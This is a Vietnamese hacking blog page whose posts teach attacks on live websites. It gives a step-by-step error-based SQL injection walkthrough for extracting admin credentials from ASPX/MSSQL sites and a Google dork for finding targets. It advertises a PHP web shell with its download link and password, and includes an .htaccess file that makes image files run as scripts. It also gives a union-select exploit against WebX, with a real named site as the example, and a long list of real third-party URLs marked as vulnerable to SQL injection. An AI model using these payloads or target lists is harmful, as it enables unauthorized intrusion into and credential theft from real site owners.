SQLI - Khai Thác Đối Với ASPX

Unclosed quotation mark after the character string ''

 Conversion failed when converting the nvarchar value 'tbl_DiaChi' to data type int.

Conversion failed when converting the nvarchar value 'tbl_DoiTac' to data type int.

  Conversion failed when converting the nvarchar value 'ID' to data type int.

 Conversion failed when converting the nvarchar value 'TenDN' to data type int.

 Conversion failed when converting the nvarchar value 'Matkhau' to data type int.

Conversion failed when converting the nvarchar value 'loimv' to data type int.  

Conversion failed when converting the nvarchar value 'maihoanglinh@' to data type int 

   Conversion failed when converting the nvarchar value 'loimv/maihoanglinh@' to data type int

              and 1=convert(int,@@version)-- -

     and 1=convert(int,@@servername)-- -

3-  Get data base name:

     and 1=convert(int,db_name())-- -

4-  Get system user

     and 1=convert(int,system_user) -- -

5-  Get table thứ nhất

     and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -

6-  Get table thứ 2:

   and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -

7-  Get table thứ 3 :

     and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -

8-   Get đến table user để lấy thông tin đăng nhập của admin

10 - Get column thứ nhất từ table chứa admin :

       and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -

11-  Get column thứ nhất từ table chứa admin :

       and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")

   12-  Get cho hết các columns cần lấy thông tin

   13-  Xuất ra thông tin username và password

        and 1=convert(int,(select top 1 column-name-1%2b’/’%2bcolumn-name-2 from TABLE-NAME-HERE))-- -

Chuyên Mục: SQL Injection

Gửi email bài đăng nàyBlogThis!Chia sẻ lên TwitterChia sẻ lên FacebookChia sẻ lên Pinterest

Người đăng: Kẻ Chọc Giận vào lúc 20:29 3 nhận xét:

[Google Dork] SQl - Public 16/6

Google Dork : inurl:Default.aspx?PageID= 

Chuyên Mục: SQL Injection

Gửi email bài đăng nàyBlogThis!Chia sẻ lên TwitterChia sẻ lên FacebookChia sẻ lên Pinterest

Người đăng: Kẻ Chọc Giận vào lúc 20:28 Không có nhận xét nào:

HOT- Giới Thiệu Tính Năng 1 Sô Shell

         

            vhb.php

        Con shell này đã được soleil Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà soleil thường sử dụng nhất.

  
http://www.mediafire.com/?hr9acl1yd1eabcw 

    Pass login: vhb

      soleil.pin

## START ##

Options +ExecCGI

AddHandler cgi-script cgi pl cgi gmc pin jpg

RewriteEngine on

RewriteRule (.*)\.mil$ $1.cgi

Options +FollowSymLinks

DirectoryIndex cmd.html

Options +Indexes

RemoveHandler .hack

AddType text/plain .hack

## milw0rmvn exploit ##

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin

AddHandler cgi-script .pin

Chuyên Mục: Local Attack

Gửi email bài đăng nàyBlogThis!Chia sẻ lên TwitterChia sẻ lên FacebookChia sẻ lên Pinterest

Người đăng: Kẻ Chọc Giận vào lúc 20:22 Không có nhận xét nào:

[Bug] WebX (showsubpage.asp) SQLI

inurl:"showsubpage.asp" "Powered By: WebX" 

null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1

  vào sau  http://www.victim.com/showsubpage.asp?subid=

- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin

Ví dụ: 

http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1

-  Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google

3-  Login

Login vào quyền admin với path mặc định:  http://www.victim.com/admin

http://www.erdf.edu.in/admin/

* List một số site dính bug này:

Chuyên Mục: SQL Injection

Gửi email bài đăng nàyBlogThis!Chia sẻ lên TwitterChia sẻ lên FacebookChia sẻ lên Pinterest

Người đăng: Kẻ Chọc Giận vào lúc 20:20 Không có nhận xét nào:

Up Shell Voi NuKeViet

Chuyên Mục: Local Attack

Gửi email bài đăng nàyBlogThis!Chia sẻ lên TwitterChia sẻ lên FacebookChia sẻ lên Pinterest

Người đăng: Kẻ Chọc Giận vào lúc 20:19 Không có nhận xét nào:

Site nước ngoài Lỗi SQLI - Phần II

http://www.fn-franchecomte.com/communique_detail.php?id=145'

http://www.charot.com/produit.php?id=20'

http://www.cre8studio.co.uk/cre8_sub.php?page_id=0&subpage_id=2'

http://www.theshootinggamepage.com/displaygames.php?id=32'

http://bulacandeped.org/viewannounce.php?id=4'

http://terekon.ru/material.php?id=1'

http://www.fn-franchecomte.com/communique_detail.php?id=29'

http://www.decorativeconcreteservices.com.mt/page.php?section=80'

http://www.glac.fr/en/produit.php?id=43'

http://www.imobiliariasaojudastadeu.com.br/main.php?tipo=4'

http://www.manka-creations.com/AG/produit.php?ID_produits=4'

http://www.inmo-tenerife.com/index.php?ort=169'

http://c.ting85.com/announcer_info.php?option=detail&ancid=19&iid=28'

http://www.nicolasmarquis.com/site/produit.php?id=%2733'

http://www.soaw.org/site/sub.php?id=25'

http://diabetesservice.co.uk/index2.php?section_id=783'

http://cacoastinfo.com/directory.hq/listingPop.php?Id=651'

http://www.waukee.org/event.php?id=19'

http://iuboss.com/productinfo.php?id=275'

http://www.polucon.com/index2.php?contentID=14'

http://bitunil.com/index.php?CMS_P=10'

http://apesandrobots.com/start.php?id_cat=3'

http://www.gameyey.com/index.php?play=topple'

http://www.benlongfineart.com/news.php?id=13'

http://ww2.fairfaxtimes.com/cms/story.php?id=1195'

http://www.bia2.com/music-review/review.php?id=182'

http://kltk.fi/index.php?k=7716'

http://www.edseven.com/item_look.php?id=4'

http://sanjatubak.com/pop.php?id=18'

http://mapleislandsales.com/product_detail.php?ID=291'

http://www.utahrealestateguide.org/profile_view.php?id=258'

http://familynewsabout.com/aboutBook.php?id=3241'

http://www.khoshkan.com/raprsy/raprsy01.php?c_page=40'

http://www.guruslodge.com/index.php?topic=6484.0'

http://www.ourgoodfight.com/parksouthchurchofchrist/get_page.php?link_id=36&page_id=12'

http://linkinthebox.com/productinfo.php?id=109'

http://perkins.pvt.k12.ma.us/museum/section.php?id=214'

http://www.maxprotech.com/maxpro-product-detail.php?id=39'

http://mappn.com/game.php?id=11'

http://www.ting85.com/announcer_info.php?option=detail&ancid=8&iid=137'

http://www.ceripp.it/curriculum.php?id=9'

http://www.soft-group.it/net/index.php?c=3a&id=32'

http://bathdiabetes.org/index2.php?section_id=9'

http://www.woodworkersworkshop.com/resources/index.php?cat=102'

http://www.qsrmc.co.uk/register.php?regionid=26'

http://www.gielighting.com/ang/_produit.php?id_cat=7'

http://www.minesandcommunities.org/look.php?id=54'

http://terekon.ru/material.php?id=6'

http://www.lrmccoy.com/product/segment.php?sg=1'

http://www.robotech.com/community/forum/messages.php?id=23'

http://www.diadosim.com.br/index.php?pagina=artigo&pc=136'

http://www.thefutureisfierce.com/releases.php?ID=25'

http://www.oasisaudio.com/product.php?prod=435'

http://www.fanfics.ru/read.php?id=1515'

http://byeu.org/photos/viewphoto.php?ID=189'

http://www.bernard-vidal.com/view-photo.php?id=76'

http://www.watergrasgouda.nl/start.php?ID=366'

http://www.kevinmurphy.com.au/products/styling_productdetail.php?id=17'

http://www.psychology.org.nz/cms_show_download.php?id=559'

 http://www.cadoganhall.com/showpage.php?pid=1519'

http://www.zigzagweeklynews.com/opinions.php?ID=3410'

http://www.stampadigital.com.br/view.php?cmd=09f0744'

http://www.intech-tunisia.com/ang/produit.php?id_cat1=2&id_cat=1'

http://www.plusline.org/article.php?id=6068'

http://www.adorjan.hu/index2.php?m=3'

http://nwvault.ign.com/View.php?view=NWN2Other.Detail&id=19'

http://www.y2neil.com/reviews/review.php?id=17'

http://www.soft-group.it/net/index.php?c=3a&id=9'

http://www.lrmccoy.com/product/segment.php?sg=4'

http://www.natalpress.com.br/humor.php?id=7775'

http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'

http://mayfairgames.com/game.php?id=212'

http://www.thingofbeauty.co.uk/prod.php?prod=217'

http://www.directcleaners.com/services.php?page_id=20'

http://www.load-islam.com/wel_islam.php?topic_id=2'

http://www.mrf.fr/ang/pages/fiche-produit.php?id=181'

http://www.iisadmin.co.uk/?p=6'

http://www.feicuidao.com/jqzx_look.php?id=26'

http://www.sportident.co.uk/full_story.php?id=115'

http://www.cedec.ca/index.php?id=1'

http://www.familiscope.ie/main.php?ID=3'

http://www.thalaspa.fr/fr/produit.php?prod_id=126'

http://www.gorodokboxing.com/material.php?id=1'

http://www.natalpress.com.br/humor.php?id=10627'

http://fpchurch.org.uk/News/view.php?id=26'

http://www.ourgoodfight.com/parksouthchurchofchrist/get_page.php?link_id=36&page_id=27'

http://www.watergrasgouda.nl/start.php?ID=519'

http://www.illoomballoon.com/news.php?id=112'

http://www.tradlyn.com/product.php?prod=prod&id=11937'

http://www.stonemarket.co.uk/section.php?id=1'

http://www.gymka.com/english/detail_produit.php?id=328'

http://www.cat100.in/messageshow.php?m_id=56'

http://www.salon52.ca/academies/curriculum.php?id=174'

http://www.heldense.com/index2.php?n_id=14'

http://dufieux-industrie.com/en/fiche_type_produit.php?id=15'

http://www.chartstats.com/art.php?release=39443'

http://perkins.pvt.k12.ma.us/museum/section.php?id=213'

http://goodsam.org/news/press.php?id=6'

http://www.salon-collective.co.uk/tigi_bed_head.php?product_id=1842'

http://www.polucon.com/index2.php?contentID=23'

http://www.ec21th.com/productinfo.php?id=194'

http://uniquentertainment.net/page.php?url=about_ue'

http://www.full-flavor.biz/start.php?page=2'

http://www.matbase.com/index.php?content=1109'

http://www.recallseeker.com/beta/detailsnew.php?release_id=12049'

http://prayerforcreationcare.creationcare.org/blank.php?id=41'

http://www.coastalengineering.com/staff_pop.php?id=1'

http://www.speleogenesis.info/archive/issue.php?SG=8'

http://infocajeme.com/humor.php?id=38'

http://www.doggonesmartbed.com/index_sub.php?did=12'

http://www.pcofiowa.com/news.php?id=15'

http://allspeedperformance.com/gallery.php?id=6'

http://www.medix.com.hr/aboutbook.php?id=33'

http://www.shoppingtang.com/productinfo.php?id=103'

http://www.laemmle.com/viewmovie.php?mid=6557'

http://www.samsungmobilers.ro/post.php?id=143'

http://www.medix.com.hr/aboutbook.php?id=30'

http://olduml.uml.lodz.pl/_view.php?str=1200'

http://www.antrimhistory.net/forum/view.php?topic_id=117'

http://www.cat100.in/messageshow.php?m_id=21'

http://www.hbztrade.com/productinfo.php?id=273'

http://www.shirtsenletters.nl/nav/artikel_info.php?i=1377'

http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'

http://www.constructionspares.com/main.php?ID=6'

http://www.johandemeij.com/post.php?id=223'

http://www.cbmin.org/cbm/staff?staff_id=10'

http://www.webakku.hu/prod_detail.php?id=837'

http://inrecs.com/releases.php?id=1'

http://www.4wdsystems.com.au/index.php?id=29'

http://www.emaxxtech.com/view_faq.php?id=34'

http://www.tomsawyer.com/pressreleases/pressrelease.php?release_id=142'

http://www.bulletproofautomotive.com/catalog-detail.php?ID=7057'

http://www.rdi-cam.com/pic.php?i=35'

http://visualfreak.com/?item_id=2014'

http://www.sghgate.net/productinfo.php?id=627'

http://www.babycareadvice.com/babycare/general_help/article.php?id=48'

http://www.homerevinc.com/product_view.php?page=1&id=968'

http://www.punp.edu.ph/main.php?id=33'

http://www.cre8studio.co.uk/cre8_sub.php?page_id=0&subpage_id=59'

http://www.ug.edu.gh/index1.php?linkid=219&sublinkid=103'

http://kornerstore.net/ks_proddetail.php?ID=104'

http://www.4wdsystems.com.au/index.php?id=1'

http://boatjax.com/pages.php?page_id=4'

http://www.sindora.com.my/Content_blank.php?id=178'

http://www.foodsafety.ksu.edu/en/page.php?s=2'

http://d1.24counter.com/map/view.php?type=180&id=1289566675'

http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=67'

http://realestatecoursereviews.com/review/index2.php?item_id=18'

http://ux.brookdalecc.edu/fac/tlc/fac/tlc_blog_post.php?id=11'

http://www.isolmax.com/ang/produit.php?ID=5'

http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=226'

http://www.kevinmurphy.com.au/products/washes_productdetail.php?id=4'

http://www.girls.njpanthers.com/preview.php?id=21'

http://www.kusuri.co.uk/view_product.php?id=242'

http://scorpx.com/?item_id=9947'

http://www.actforkids.com.au/news_full.php?id=111'

http://askort.com/?item_id=5696'

http://www.coolmore.com/stallions-view.php?list=ireland&id=15'

http://www.oiwsba.com/oiwsba/memberinfo.php?id=54'

http://www.rabenvater.at/default.php?mid=14&lid=1'

http://www.plusline.org/article.php?id=4695'

http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'

Chuyên Mục: SQL Injection

Gửi email bài đăng nàyBlogThis!Chia sẻ lên TwitterChia sẻ lên FacebookChia sẻ lên Pinterest

Người đăng: Kẻ Chọc Giận vào lúc 20:18 Không có nhận xét nào: